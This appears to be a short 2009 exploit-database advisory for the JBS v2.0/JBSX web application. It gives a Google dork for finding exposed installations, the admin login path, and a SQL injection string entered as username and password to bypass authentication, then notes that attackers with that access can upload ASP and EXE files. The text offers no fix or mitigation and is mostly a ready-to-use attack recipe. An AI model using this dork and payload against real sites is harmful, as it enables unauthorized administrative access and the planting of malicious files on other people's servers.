id: 9994
date: 11/17/2009
title: JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload
author: blackenedsecurity
cves: 

=====================================================================================
JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability
=====================================================================================

# Administration panel bypass and Malicious File Upload Vulnerability
# JBS v2.0 JBSX and other Jiro's Products
# Google Dork: "inurl:/files/redirect.asp"
 
 
Go to url files/login.asp
 
admin 'or' '='   
password 'or' '='
 
H4ckers may upload malicious files by using upload panel as they have administrator acces
they are able to change settings and upload asp and exe files.



#  0day.today [2023-03-26]  #